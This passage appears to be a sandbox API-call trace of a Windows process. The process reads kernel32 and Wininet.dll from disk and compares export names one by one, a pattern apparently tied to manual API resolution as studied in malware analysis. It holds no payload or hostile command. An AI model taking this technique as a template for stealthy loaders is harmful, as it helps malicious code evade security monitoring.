0x46c5f0 [0079.696] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0079.696] ReadFile (in: hFile=0x134, lpBuffer=0x46c5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x46c5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0079.714] CloseHandle (hObject=0x134) returned 1 [0079.714] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0079.720] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0079.720] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0079.720] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0079.720] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0079.720] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0079.720] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0079.720] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0079.720] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0079.720] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0079.720] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0079.720] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0079.721] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0079.721] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0079.721] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0079.721] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0079.721] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0079.721] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0079.721] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0079.721] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0079.721] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0079.721] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0079.721] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0079.721] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0079.721] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0079.721] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0079.722] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0079.722] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0079.722] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0079.722] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0079.722] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0079.722] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0079.722] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0079.722] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0079.722] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.723] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.723] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0079.724] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.724] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0079.725] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0079.725] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0079.725] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.725] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0079.726] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0079.726] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0079.726] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0079.726] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0079.726] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0079.727] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.727] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0079.728] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0079.728] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0079.729] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0080.639] GetProcessHeap () returned 0x440000 [0080.639] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x46c5f0 | out: hHeap=0x440000) returned 1 [0080.639] GetProcessHeap () returned 0x440000 [0080.639] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459360 [0080.639] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0081.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0081.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0081.335] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0081.335] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0081.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0081.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0081.335] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0081.335] GetProcessHeap () returned 0x440000 [0081.335] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x286600) returned 0x4030040 [0081.341] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0081.341] ReadFile (in: hFile=0x140, lpBuffer=0x4030040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4030040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0081.505] CloseHandle (hObject=0x140) returned 1 [0081.505] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0081.505] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") 